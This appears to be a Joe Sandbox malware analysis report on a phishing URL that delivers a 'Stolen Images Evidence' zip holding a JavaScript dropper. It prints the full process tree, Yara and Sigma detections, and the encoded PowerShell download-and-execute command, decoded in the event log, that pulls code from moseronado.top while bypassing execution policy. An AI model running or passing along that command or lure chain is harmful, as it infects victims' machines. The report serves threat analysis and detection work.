Loading ...

Play interactive tourEdit tour

Windows Analysis Report https://storage.googleapis.com/m4b38h10cm38.appspot.com/d/file/0/public/a/3fdjn39fduh3nfdfn.html?l=048464344988443721#

Overview

General Information

Sample URL:https://storage.googleapis.com/m4b38h10cm38.appspot.com/d/file/0/public/a/3fdjn39fduh3nfdfn.html?l=048464344988443721#
Analysis ID:505091
Infos:

Most interesting Screenshot:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious encrypted Powershell command line found
Antivirus detection for URL or domain
Yara detected Powershell download and execute
Sigma detected: Suspicious Script Execution From Temp Folder
Writes to foreign memory regions
PowerShell case anomaly found
Wscript starts Powershell (via cmd or directly)
Sigma detected: Suspicious Encoded PowerShell Command Line
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Suspicious powershell command line found
Sigma detected: Suspicious PowerShell Invocations - Specific
Sigma detected: WScript or CScript Dropper
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution
Detected potential crypto function
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • chrome.exe (PID: 4724 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation 'https://storage.googleapis.com/m4b38h10cm38.appspot.com/d/file/0/public/a/3fdjn39fduh3nfdfn.html?l=048464344988443721#' MD5: C139654B5C1438A95B321BB01AD63EF6)
    • chrome.exe (PID: 2876 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1556,11587432688044278777,2975671469201023268,131072 --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1940 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
    • chrome.exe (PID: 7012 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1556,11587432688044278777,2975671469201023268,131072 --lang=en-US --service-sandbox-type=none --enable-audio-service-sandbox --mojo-platform-channel-handle=5896 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
    • unarchiver.exe (PID: 6684 cmdline: 'C:\Windows\SysWOW64\unarchiver.exe' 'C:\Users\user\Downloads\Stolen Images Evidence.zip' MD5: DB55139D9DD29F24AE8EA8F0E5606901)
      • 7za.exe (PID: 6068 cmdline: 'C:\Windows\System32\7za.exe' x -pinfected -y -o'C:\Users\user\AppData\Local\Temp\inbh3w2x.kjd' 'C:\Users\user\Downloads\Stolen Images Evidence.zip' MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
        • conhost.exe (PID: 768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6380 cmdline: 'cmd.exe' /C 'C:\Users\user\AppData\Local\Temp\inbh3w2x.kjd\Stolen Images Evidence.js' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 2840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • wscript.exe (PID: 6820 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\inbh3w2x.kjd\Stolen Images Evidence.js' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
          • cmd.exe (PID: 5400 cmdline: 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBvAHMAZQByAG8AbgBhAGQAbwAuAHQAbwBwAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA= MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • powershell.exe (PID: 5648 cmdline: poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBvAHMAZQByAG8AbgBhAGQAbwAuAHQAbwBwAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA= MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • chrome.exe (PID: 6388 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1556,11587432688044278777,2975671469201023268,131072 --lang=en-US --service-sandbox-type=none --enable-audio-service-sandbox --mojo-platform-channel-handle=4628 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
    • unarchiver.exe (PID: 5892 cmdline: 'C:\Windows\SysWOW64\unarchiver.exe' 'C:\Users\user\Downloads\Stolen Images Evidence (1).zip' MD5: DB55139D9DD29F24AE8EA8F0E5606901)
      • 7za.exe (PID: 3060 cmdline: 'C:\Windows\System32\7za.exe' x -pinfected -y -o'C:\Users\user\AppData\Local\Temp\wx0c5czs.h3n' 'C:\Users\user\Downloads\Stolen Images Evidence (1).zip' MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
        • conhost.exe (PID: 5596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 1412 cmdline: 'cmd.exe' /C 'C:\Users\user\AppData\Local\Temp\wx0c5czs.h3n\Stolen Images Evidence.js' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 1100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • wscript.exe (PID: 6888 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\wx0c5czs.h3n\Stolen Images Evidence.js' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
          • cmd.exe (PID: 1324 cmdline: 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBvAHMAZQByAG8AbgBhAGQAbwAuAHQAbwBwAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA= MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • powershell.exe (PID: 6268 cmdline: poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBvAHMAZQByAG8AbgBhAGQAbwAuAHQAbwBwAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA= MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • chrome.exe (PID: 6692 cmdline: 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1556,11587432688044278777,2975671469201023268,131072 --lang=en-US --service-sandbox-type=none --enable-audio-service-sandbox --mojo-platform-channel-handle=3644 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
    • unarchiver.exe (PID: 1456 cmdline: 'C:\Windows\SysWOW64\unarchiver.exe' 'C:\Users\user\Downloads\Stolen Images Evidence (2).zip' MD5: DB55139D9DD29F24AE8EA8F0E5606901)
      • 7za.exe (PID: 6252 cmdline: 'C:\Windows\System32\7za.exe' x -pinfected -y -o'C:\Users\user\AppData\Local\Temp\s4fhf54g.u35' 'C:\Users\user\Downloads\Stolen Images Evidence (2).zip' MD5: 77E556CDFDC5C592F5C46DB4127C6F4C)
        • conhost.exe (PID: 6972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 3540 cmdline: 'cmd.exe' /C 'C:\Users\user\AppData\Local\Temp\s4fhf54g.u35\Stolen Images Evidence.js' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • wscript.exe (PID: 4840 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\s4fhf54g.u35\Stolen Images Evidence.js' MD5: 7075DD7B9BE8807FCA93ACD86F724884)
          • cmd.exe (PID: 6420 cmdline: 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBvAHMAZQByAG8AbgBhAGQAbwAuAHQAbwBwAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA= MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • powershell.exe (PID: 6208 cmdline: poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBvAHMAZQByAG8AbgBhAGQAbwAuAHQAbwBwAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA= MD5: DBA3E6449E97D4E3DF64527EF7012A10)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Documents\20211018\PowerShell_transcript.610930.3wwpsSEZ.20211018224633.txtPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
  • 0x123:$sa1: -enc
  • 0x50a:$sa1: -enc
  • 0x10e:$sb1: -w hidden
  • 0x4f5:$sb1: -w hidden
  • 0x109:$sc1: -nop
  • 0x4f0:$sc1: -nop
  • 0x118:$se1: -ep bypass
  • 0x4ff:$se1: -ep bypass
C:\Users\user\Documents\20211018\PowerShell_transcript.610930.3wwpsSEZ.20211018224633.txtJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    C:\Users\user\Documents\20211018\PowerShell_transcript.610930.OeKRHfkQ.20211018224629.txtPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
    • 0x123:$sa1: -enc
    • 0x50a:$sa1: -enc
    • 0x10e:$sb1: -w hidden
    • 0x4f5:$sb1: -w hidden
    • 0x109:$sc1: -nop
    • 0x4f0:$sc1: -nop
    • 0x118:$se1: -ep bypass
    • 0x4ff:$se1: -ep bypass
    C:\Users\user\Documents\20211018\PowerShell_transcript.610930.OeKRHfkQ.20211018224629.txtJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      C:\Users\user\Documents\20211018\PowerShell_transcript.610930.D04HlV6H.20211018224618.txtPowerShell_Susp_Parameter_ComboDetects PowerShell invocation with suspicious parametersFlorian Roth
      • 0x123:$sa1: -enc
      • 0x50a:$sa1: -enc
      • 0x10e:$sb1: -w hidden
      • 0x4f5:$sb1: -w hidden
      • 0x109:$sc1: -nop
      • 0x4f0:$sc1: -nop
      • 0x118:$se1: -ep bypass
      • 0x4ff:$se1: -ep bypass
      Click to see the 1 entries

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000021.00000003.338953199.00000000058D7000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
      • 0x2b06:$s1: poWERshEll
      • 0x2dd4:$s1: poWERshEll
      00000025.00000003.353205195.000000000356D000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
      • 0x883c:$s1: poWERshEll
      00000025.00000003.354211813.0000000003571000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
      • 0x483c:$s1: poWERshEll
      0000001B.00000003.319065824.0000000004C08000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
      • 0x1b06:$s1: poWERshEll
      • 0x1dd4:$s1: poWERshEll
      0000001E.00000002.430635881.00000000051CE000.00000004.00000001.sdmpPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
      • 0x1980:$s1: poWERshEll
      • 0x26be:$s1: poWERshEll
      • 0x321e:$s1: poWERshEll
      • 0x3a68:$s1: poWERshEll
      • 0x3d04:$s1: poWERshEll
      Click to see the 52 entries

      Sigma Overview

      System Summary:

      barindex
      Sigma detected: Suspicious Script Execution From Temp FolderShow sources
      Source: Process startedAuthor: Florian Roth, Max Altgelt: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\inbh3w2x.kjd\Stolen Images Evidence.js' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\inbh3w2x.kjd\Stolen Images Evidence.js' , CommandLine|base64offset|contains: "fz, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'cmd.exe' /C 'C:\Users\user\AppData\Local\Temp\inbh3w2x.kjd\Stolen Images Evidence.js', ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6380, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\inbh3w2x.kjd\Stolen Images Evidence.js' , ProcessId: 6820
      Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
      Source: Process startedAuthor: Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBvAHMAZQByAG8AbgBhAGQAbwAuAHQAbwBwAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=, CommandLine: 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBvAHMAZQByAG8AbgBhAGQAbwAuAHQAbwBwAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\inbh3w2x.kjd\Stolen Images Evidence.js' , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 6820, ProcessCommandLine: 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBvAHMAZQByAG8AbgBhAGQAbwAuAHQAbwBwAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=, ProcessId: 5400
      Sigma detected: Suspicious PowerShell Invocations - SpecificShow sources
      Source: Event LogsAuthor: Florian Roth (rule), Jonhnathan Ribeiro: Data: EventID: 4104, Source: Microsoft-Windows-PowerShell, data 0: 1, data 1: 1, data 2: IEX (New-Object Net.Webclient).downloadstring("http://moseronado.top/333g100/index.php"), data 3: 71efb089-49b8-4249-8e3b-5d497e16e95c, data 4:
      Sigma detected: WScript or CScript DropperShow sources
      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (rule), oscd.community: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\inbh3w2x.kjd\Stolen Images Evidence.js' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\inbh3w2x.kjd\Stolen Images Evidence.js' , CommandLine|base64offset|contains: "fz, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'cmd.exe' /C 'C:\Users\user\AppData\Local\Temp\inbh3w2x.kjd\Stolen Images Evidence.js', ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6380, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\inbh3w2x.kjd\Stolen Images Evidence.js' , ProcessId: 6820
      Sigma detected: WSF/JSE/JS/VBA/VBE File ExecutionShow sources
      Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\inbh3w2x.kjd\Stolen Images Evidence.js' , CommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\inbh3w2x.kjd\Stolen Images Evidence.js' , CommandLine|base64offset|contains: "fz, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: 'cmd.exe' /C 'C:\Users\user\AppData\Local\Temp\inbh3w2x.kjd\Stolen Images Evidence.js', ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6380, ProcessCommandLine: 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\inbh3w2x.kjd\Stolen Images Evidence.js' , ProcessId: 6820
      Sigma detected: Non Interactive PowerShellShow sources
      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBvAHMAZQByAG8AbgBhAGQAbwAuAHQAbwBwAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=, CommandLine: poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBvAHMAZQByAG8AbgBhAGQAbwAuAHQAbwBwAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=, CommandLine|base64offset|contains: FD, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBvAHMAZQByAG8AbgBhAGQAbwAuAHQAbwBwAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5400, ProcessCommandLine: poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AbQBvAHMAZQByAG8AbgBhAGQAbwAuAHQAbwBwAC8AMwAzADMAZwAxADAAMAAvAGkAbgBkAGUAeAAuAHAAaABwACIAKQA=, ProcessId: 5648
      Sigma detected: T1086 PowerShell ExecutionShow sources
      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132790959761494919.5648.DefaultAppDomain.powershell

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Antivirus detection for URL or domainShow sources
      Source: http://moseronado.top/Avira URL Cloud: Label: malware
      Source: http://moseronado.topAvira URL Cloud: Label: malware
      Source: http://moseronado.top/333g100/index.phpAvira URL Cloud: Label: malware
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Local\Temp\4724_1438030691\LICENSE.txtJump to behavior
      Source: C:\Windows\SysWOW64\unarchiver.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\DictionariesJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries\en-US-9-0.bdicJump to behavior
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb4C source: powershell.exe, 0000001E.00000002.425859097.0000000002DB7000.00000004.00000020.sdmp
      Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 4x nop then jmp 02CC099Bh7_2_02CC02A8
      Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 4x nop then jmp 02CC099Ah7_2_02CC02A8
      Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 4x nop then jmp 0520099Bh14_2_052002A8
      Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 4x nop then jmp 0520099Ah14_2_052002A8
      Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 4x nop then jmp 02CF099Bh22_2_02CF02A8
      Source: C:\Windows\SysWOW64\unarchiver.exeCode function: 4x nop then jmp 02CF099Ah22_2_02CF02A8